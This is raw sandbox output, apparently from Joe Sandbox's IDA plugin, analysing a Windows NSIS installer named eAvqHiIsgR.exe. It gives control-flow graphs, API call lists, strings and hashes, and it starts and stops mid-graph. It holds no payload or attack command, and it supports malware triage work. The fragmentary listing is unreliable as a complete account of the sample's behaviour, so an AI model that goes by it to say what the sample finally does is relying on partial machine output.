17 API calls 5543->5551 5544->5545 5544->5554 5545->5537 5549 403da2 5546->5549 5550 403db7 5546->5550 5547 404154 SendMessageA 5547->5537 5548 40417b 18 API calls 5548->5551 5553 40140b 2 API calls 5549->5553 5552 40140b 2 API calls 5550->5552 5551->5527 5551->5535 5551->5536 5551->5543 5551->5548 5555 40417b 18 API calls 5551->5555 5571 404046 DestroyWindow 5551->5571 5552->5554 5553->5554 5554->5537 5554->5547 5556 403f32 GetDlgItem 5555->5556 5557 403f47 5556->5557 5558 403f4f ShowWindow EnableWindow 5556->5558 5557->5558 5581 40419d EnableWindow 5558->5581 5560 403f79 EnableWindow 5565 403f8d 5560->5565 5561 403f92 GetSystemMenu EnableMenuItem SendMessageA 5562 403fc2 SendMessageA 5561->5562 5561->5565 5562->5565 5564 403c88 18 API calls 5564->5565 5565->5561 5565->5564 5582 4041b0 SendMessageA 5565->5582 5583 4060f7 lstrcpynA 5565->5583 5567 403ff1 lstrlenA 5568 40618a 17 API calls 5567->5568 5569 404002 SetWindowTextA 5568->5569 5570 401389 2 API calls 5569->5570 5570->5551 5572 404060 CreateDialogParamA 5571->5572 5571->5580 5573 404093 5572->5573 5572->5580 5574 40417b 18 API calls 5573->5574 5575 40409e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5574->5575 5576 401389 2 API calls 5575->5576 5577 4040e4 5576->5577 5577->5527 5578 4040ec ShowWindow 5577->5578 5579 4041c7 SendMessageA 5578->5579 5579->5580 5580->5527 5580->5542 5581->5560 5582->5565 5583->5567 4745 40272b 4746 402732 4745->4746 4752 4029aa 4745->4752 4747 402bac 17 API calls 4746->4747 4748 402739 4747->4748 4749 402748 SetFilePointer 4748->4749 4750 402758 4749->4750 4749->4752 4753 406055 wsprintfA 4750->4753 4753->4752 4764 401c2e 4765 402bac 17 API calls 4764->4765 4766 401c35 4765->4766 4767 402bac 17 API calls 4766->4767 4768 401c42 4767->4768 4769 401c57 4768->4769 4771 402bce 17 API calls 4768->4771 4770 401c67 4769->4770 4772 402bce 17 API calls 4769->4772 4773 401c72 4770->4773 4774 401cbe 4770->4774 4771->4769 4772->4770 4775 402bac 17 API calls 4773->4775 4776 402bce 17 API calls 4774->4776 4777 401c77 4775->4777 4778 401cc3 4776->4778 4779 402bac 17 API calls 4777->4779 4780 402bce 17 API calls 4778->4780 4782 401c83 4779->4782 4781 401ccc FindWindowExA 4780->4781 4783 401cea 4781->4783 4784 401c90 SendMessageTimeoutA 4782->4784 4785 401cae SendMessageA 4782->4785 4784->4783 4785->4783 5584 4042b1 lstrcpynA lstrlenA 4792 401e35 GetDC 4793 402bac 17 API calls 4792->4793 4794 401e47 GetDeviceCaps MulDiv ReleaseDC 4793->4794 4795 402bac 17 API calls 4794->4795 4796 401e78 4795->4796 4797 40618a 17 API calls 4796->4797 4798 401eb5 CreateFontIndirectA 4797->4798 4799 402620 4798->4799 5585 402a35 SendMessageA 5586 402a4f InvalidateRect 5585->5586 5587 402a5a 5585->5587 5586->5587 5588 72a415d1 5589 72a414bb GlobalFree 5588->5589 5591 72a415e9 5589->5591 5590 72a4162f GlobalFree 5591->5590 5592 72a41604 5591->5592 5593 72a4161b VirtualFree 5591->5593 5592->5590 5593->5590 5594 4014b7 5595 4014bd 5594->5595 5596 401389 2 API calls 5595->5596 5597 4014c5 5596->5597 5598 402dba 5599 402de2 5598->5599 5600 402dc9 SetTimer 5598->5600 5601 402e37 5599->5601 5602 402dfc MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5599->5602 5600->5599 5602->5601 4846 4015bb 4847 402bce 17 API calls 4846->4847 4848 4015c2 4847->4848 4849 405b28 4 API calls 4848->4849 4862 4015ca 4849->4862 4850 401624 4852 401652 4850->4852 4853 401629 4850->4853 4851 405aba CharNextA 4851->4862 4855 401423 24 API calls 4852->4855 4854 401423 24 API calls 4853->4854 4856 401630 4854->4856 4861 40164a 4855->4861 4865 4060f7 lstrcpynA 4856->4865 4858 405761 2 API calls 4858->4862 4859 40577e 5 API calls 4859->4862 4860 40163b SetCurrentDirectoryA 4860->4861 4862->4850 4862->4851 4862->4858 4862->4859 4863 40160c GetFileAttributesA 4862->4863 4864 4056e4 4 API calls 4862->4864 4863->4862 4864->4862 4865->4860 5603 4016bb 5604 402bce 17 API calls 5603->5604 5605 4016c1 GetFullPathNameA 5604->5605 5606 4016d8 5605->5606 5612 4016f9 5605->5612 5609 40646b 2 API calls 5606->5609 5606->5612 5607 402a5a 5608 40170d GetShortPathNameA 5608->5607 5610 4016e9 5609->5610 5610->5612 5613 4060f7 lstrcpynA 5610->5613 5612->5607 5612->5608 5613->5612 5614 72a41058 5616 72a41074 5614->5616 5615 72a410dc 5616->5615 5617 72a41091 5616->5617 5618 72a414bb GlobalFree 5616->5618 5619 72a414bb GlobalFree 5617->5619 5618->5617 5620 72a410a1 5619->5620 5621 72a410b1 5620->5621 5622 72a410a8 GlobalSize 5620->5622 5623 72a410b5 GlobalAlloc 5621->5623 5624 72a410c6 5621->5624 5622->5621 5625 72a414e2 3 API calls 5623->5625 5626 72a410d1 GlobalFree 5624->5626 5625->5624 5626->5615 5627 72a4225a 5628 72a422c4 5627->5628 5629 72a422cf GlobalAlloc 5628->5629 5630 72a422ee 5628->5630 5629->5628

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 403348-403387 SetErrorMode GetVersion 1 403389-403391 call 406500 0->1 2 40339a 0->2 1->2 7 403393 1->7 4 40339f-4033b2 call 406492 lstrlenA 2->4 9 4033b4-4033d0 call 406500 * 3 4->9 7->2 16 4033e1-40343f #17 OleInitialize SHGetFileInfoA call 4060f7 GetCommandLineA call 4060f7 9->16 17 4033d2-4033d8 9->17 24 403441-403446 16->24 25 40344b-403460 call 405aba CharNextA 16->25 17->16 21 4033da 17->21 21->16 24->25 28 403525-403529 25->28 29 403465-403468 28->29 30 40352f 28->30 32 403470-403478 29->32 33 40346a-40346e 29->33 31 403542-40355c GetTempPathA call 403317 30->31 42 4035b4-4035ce DeleteFileA call 402ea1 31->42 43 40355e-40357c GetWindowsDirectoryA lstrcatA call 403317 31->43 34 403480-403483 32->34 35 40347a-40347b 32->35 33->32 33->33 37 403515-403522 call 405aba 34->37 38 403489-40348d 34->38 35->34 37->28 57 403524 37->57 40 4034a5-4034d2 38->40 41 40348f-403495 38->41 47 4034d4-4034da 40->47 48 4034e5-403513 40->48 45 403497-403499 41->45 46 40349b 41->46 58 403662-403672 call 403830 OleUninitialize 42->58 59 4035d4-4035da 42->59 43->42 61 40357e-4035ae GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403317 43->61 45->40 45->46 46->40 52 4034e0 47->52 53 4034dc-4034de 47->53 48->37 55 403531-40353d call 4060f7 48->55 52->48 53->48 53->52 55->31 57->28 72 403796-40379c 58->72 73 403678-403688 call 405813 ExitProcess 58->73 62 403652-403659 call 40390a 59->62 63 4035dc-4035e7 call 405aba 59->63 61->42 61->58 70 40365e 62->70 74 4035e9-403612 63->74 75 40361d-403627 63->75 70->58 77 403818-403820 72->77 78 40379e-4037b7 GetCurrentProcess OpenProcessToken 72->78 79 403614-403616 74->79 82 403629-403636 call 405b7d 75->82 83 40368e-4036a2 call 40577e lstrcatA 75->83 80 403822 77->80 81 403826-40382a ExitProcess 77->81 85 4037e9-4037f7 call 406500 78->85 86 4037b9-4037e3 LookupPrivilegeValueA AdjustTokenPrivileges 78->86 79->75 87 403618-40361b 79->87 80->81 82->58 96 403638-40364e call 4060f7 * 2 82->96 97 4036a4-4036aa lstrcatA 83->97 98 4036af-4036c9 lstrcatA lstrcmpiA 83->98 94 403805-40380f ExitWindowsEx 85->94 95 4037f9-403803 85->95 86->85 87->75 87->79 94->77 99 403811-403813 call 40140b 94->99 95->94 95->99 96->62 97->98 98->58 101 4036cb-4036ce 98->101 99->77 105 4036d0-4036d5 call 4056e4 101->105 106 4036d7 call 405761 101->106 111 4036dc-4036e9 SetCurrentDirectoryA 105->111 106->111 113 4036f6-40371e call 4060f7 111->113 114 4036eb-4036f1 call 4060f7 111->114 118 403724-403740 call 40618a DeleteFileA 113->118 114->113 121 403781-403788 118->121 122 403742-403752 CopyFileA 118->122 121->118 123 40378a-403791 call 405ed6 121->123 122->121 124 403754-403774 call 405ed6 call 40618a call 405796 122->124 123->58 124->121 133 403776-40377d CloseHandle 124->133 133->121
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE ref: 0040336D
                                                                      • GetVersion.KERNEL32 ref: 00403373
                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                                      • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                                      • OleInitialize.OLE32(00000000), ref: 004033E9
                                                                      • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                                      • GetCommandLineA.KERNEL32(sprjtelakeringer Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                                      • CharNextA.USER32(00000000,"C:\Users\user\Desktop\eAvqHiIsgR.exe",00000020,"C:\Users\user\Desktop\eAvqHiIsgR.exe",00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                                      • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                                      • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                                      • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                                      • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                                      • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                                        • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                        • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                        • Part of subcall function 0040390A: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,75923410), ref: 004039FA
                                                                        • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                                        • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                                        • Part of subcall function 0040390A: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                                        • Part of subcall function 0040390A: RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                                        • Part of subcall function 00403830: CloseHandle.KERNEL32(000002CC,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                                      • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                                      • ExitProcess.KERNEL32 ref: 00403688
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                                                                      • ExitProcess.KERNEL32 ref: 0040382A
                                                                        • Part of subcall function 00405813: MessageBoxIndirectA.USER32(0040A218), ref: 0040586E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                      • String ID: "$"C:\Users\user\Desktop\eAvqHiIsgR.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\eAvqHiIsgR.exe$C:\Users\user\tranchet$C:\Users\user\tranchet\Trykmaalere$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$sprjtelakeringer Setup$~nsu
                                                                      • API String ID: 3776617018-824823420
                                                                      • Opcode ID: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
                                                                      • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                                      • Opcode Fuzzy Hash: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
                                                                      • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F
                                                                      APIs
                                                                        • Part of subcall function 72A41215: GlobalAlloc.KERNEL32(00000040,72A41233,?,72A412CF,-72A4404B,72A411AB,-000000A0), ref: 72A4121D
                                                                      • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 72A41BC4
                                                                      • lstrcpyA.KERNEL32(00000008,?), ref: 72A41C0C
                                                                      • lstrcpyA.KERNEL32(00000408,?), ref: 72A41C16
                                                                      • GlobalFree.KERNEL32(00000000), ref: 72A41C29
                                                                      • GlobalFree.KERNEL32(?), ref: 72A41D09
                                                                      • GlobalFree.KERNEL32(?), ref: 72A41D0E
                                                                      • GlobalFree.KERNEL32(?), ref: 72A41D13
                                                                      • GlobalFree.KERNEL32(00000000), ref: 72A41EFA
                                                                      • lstrcpyA.KERNEL32(?,?), ref: 72A42098
                                                                      • GetModuleHandleA.KERNEL32(00000008), ref: 72A42114
                                                                      • LoadLibraryA.KERNEL32(00000008), ref: 72A42125
                                                                      • GetProcAddress.KERNEL32(?,?), ref: 72A4217E
                                                                      • lstrlenA.KERNEL32(00000408), ref: 72A42198
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3692894064.0000000072A41000.00000020.00000001.01000000.00000005.sdmp, Offset: 72A40000, based on PE: true
                                                                      • Associated: 00000000.00000002.3692870436.0000000072A40000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3692910209.0000000072A43000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3692981384.0000000072A45000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_72a40000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                      • String ID:
                                                                      • API String ID: 245916457-0
                                                                      • Opcode ID: f2842a349108c84ecb24d60a4aeb7ad3f5c65b8eda0180e0c4f9b8fe325fea61
                                                                      • Instruction ID: f7f5fca2c01b5b150d5e56225510092eeef0f5435b9717fada9ea2778d657285
                                                                      • Opcode Fuzzy Hash: f2842a349108c84ecb24d60a4aeb7ad3f5c65b8eda0180e0c4f9b8fe325fea61
                                                                      • Instruction Fuzzy Hash: D2226B71D4420ADBDB118FACC9807ADBBF5FB49309F20752ED196A2198DF74DA82CB50

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 558 4058bf-4058e5 call 405b7d 561 4058e7-4058f9 DeleteFileA 558->561 562 4058fe-405905 558->562 563 405a88-405a8c 561->563 564 405907-405909 562->564 565 405918-405928 call 4060f7 562->565 566 405a36-405a3b 564->566 567 40590f-405912 564->567 571 405937-405938 call 405ad6 565->571 572 40592a-405935 lstrcatA 565->572 566->563 570 405a3d-405a40 566->570 567->565 567->566 573 405a42-405a48 570->573 574 405a4a-405a52 call 40646b 570->574 576 40593d-405940 571->576 572->576 573->563 574->563 581 405a54-405a68 call 405a8f call 405877 574->581 579 405942-405949 576->579 580 40594b-405951 lstrcatA 576->580 579->580 582 405956-405974 lstrlenA FindFirstFileA 579->582 580->582 597 405a80-405a83 call 40521e 581->597 598 405a6a-405a6d 581->598 584 40597a-405991 call 405aba 582->584 585 405a2c-405a30 582->585 591 405993-405997 584->591 592 40599c-40599f 584->592 585->566 587 405a32 585->587 587->566 591->592 594 405999 591->594 595 4059a1-4059a6 592->595 596 4059b2-4059c0 call 4060f7 592->596 594->592 599 4059a8-4059aa 595->599 600 405a0b-405a1d FindNextFileA 595->600 608 4059c2-4059ca 596->608 609 4059d7-4059e2 call 405877 596->609 597->563 598->573 602 405a6f-405a7e call 40521e call 405ed6 598->602 599->596 604 4059ac-4059b0 599->604 600->584 606 405a23-405a26 FindClose 600->606 602->563 604->596 604->600 606->585 608->600 611 4059cc-4059d5 call 4058bf 608->611 617 405a03-405a06 call 40521e 609->617 618 4059e4-4059e7 609->618 611->600 617->600 620 4059e9-4059f9 call 40521e call 405ed6 618->620 621 4059fb-405a01 618->621 620->600 621->600
                                                                      APIs
                                                                      • DeleteFileA.KERNELBASE(?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058E8
                                                                      • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405930
                                                                      • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405951
                                                                      • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405957
                                                                      • FindFirstFileA.KERNELBASE(0042B898,?,?,?,0040A014,?,0042B898,?,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405968
                                                                      • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                                      • FindClose.KERNEL32(00000000), ref: 00405A26
                                                                      Strings
                                                                      • "C:\Users\user\Desktop\eAvqHiIsgR.exe", xrefs: 004058BF
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                                                                      • \*.*, xrefs: 0040592A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                      • String ID: "C:\Users\user\Desktop\eAvqHiIsgR.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                      • API String ID: 2035342205-4106707045
                                                                      • Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                                      • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                                      • Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                                      • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                      Strings
                                                                      • C:\Users\user\tranchet\Trykmaalere, xrefs: 00402230
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharCreateInstanceMultiWide
                                                                      • String ID: C:\Users\user\tranchet\Trykmaalere
                                                                      • API String ID: 123533781-1178395610
                                                                      • Opcode ID: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                                      • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                                      • Opcode Fuzzy Hash: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                                      • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                                                                      APIs
                                                                      • FindFirstFileA.KERNELBASE(75923410,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,75923410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75923410,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                                                                      • FindClose.KERNELBASE(00000000), ref: 00406482
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2295610775-0
                                                                      • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                      • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                                                                      • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                      • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                                                                      APIs
                                                                      • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 004027B0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.3669603090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.3669584208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669619351.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669634714.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.3669729745.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_eAvqHiIsgR.jbxd
                                                                      Similarity
                                                                      • API ID: FileFindFirst
                                                                      • String ID:
                                                                      • API String ID: 1974802433-0
                                                                      • Opcode ID: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
                                                                      • Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
                                                                      • Opcode Fuzzy Hash: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
                                                                      • Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 134 40390a-403922 call 406500 137 403924-403934 call 406055 134->137 138 403936-403967 call 405fde 134->138 147 40398a-4039b3 call 403bcf call 405b7d 137->147 142 403969-40397a call 405fde 138->142 143 40397f-403985 lstrcatA 138->143 142->143 143->147 152 4039b9-4039be 147->152 153 403a3a-403a42 call 405b7d 147->153 152->153 154 4039c0-4039e4 call 405fde 152->154 158 403a50-403a75 LoadImageA 153->158 159 403a44-403a4b call 40618a 153->159 154->153 161 4039e6-4039e8 154->161 163 403af6-403afe call 40140b 158->163 164 403a77-403aa7 RegisterClassA 158->164 159->158 165 4039f9-403a05 lstrlenA 161->165 166 4039ea-4039f7 call 405aba 161->166 177 403b00-403b03 163->177 178 403b08-403b13 call 403bcf 163->178 167 403bc5 164->167 168 403aad-403af1 SystemParametersInfoA CreateWindowExA 164->168 172 403a07-403a15 lstrcmpiA 165->172 173 403a2d-403a35 call 405a8f call 4060f7 165->173 166->165 171 403bc7-403bce 167->171 168->163 172->173 176 403a17-403a21 GetFileAttributesA 172->176 173->153 180 403a23-403a25 176->180 181 403a27-403a28 call 405ad6 176->181 177->171 187 403b19-403b33 ShowWindow call 406492 178->187 188 403b9c-403ba4 call 4052f0 178->188 180->173 180->181 181->173 193 403b35-403b3a call 406492 187->193 194 403b3f-403b51 GetClassInfoA 187->194 195 403ba6-403bac 188->195 196 403bbe-403bc0 call 40140b 188->196 193->194 199 403b53-403b63 GetClassInfoA RegisterClassA 194->199 200 